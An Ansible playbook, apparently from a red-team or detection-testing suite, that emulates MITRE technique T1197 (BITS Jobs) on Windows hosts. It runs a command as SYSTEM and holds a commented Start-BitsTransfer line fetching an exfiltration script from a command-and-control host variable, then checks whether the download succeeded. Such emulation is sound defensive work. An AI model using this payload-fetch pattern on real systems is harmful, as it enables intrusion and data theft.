#T1197 - BITS Jobs
- name: BITS Jobs - Windows
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
          - name: Download payload
            tags: always
            become: yes
            ansible_become_user: "SYSTEM"
            win_shell: whoami > c:\temp\whoami.txt
            # If you want to use HTTPS, make sure remote certificate is valid or a add root ca if self-signed
            #Start-BitsTransfer -Priority foreground -Source http://{{ cnc_fqdn }}:{{ cnc_port }}/{{ exfil_script_windows }} -Destination c:\TEMP\bitsadmin_flag.ps1
          - name: sleep for 10 seconds and continue with play if download was blocked or not
            tags: always
            wait_for: timeout=10
            delegate_to: localhost
          - name: Check Payload downloaded
            tags: always
            win_command: type %TEMP%\bitsadmin_flag.ps1
            register: T1197
          - name: check if playbook was successfull
            tags: always
            debug: msg="Playbook Completed:T1197:passed:win:"
            when: '"net user" in T1197.stdout'
          - name: check if playbook was successfull
            tags: always
            debug: msg="Playbook Completed:T1197:failed:win:"
            when: '"cannot find" in T1197.stdout' 
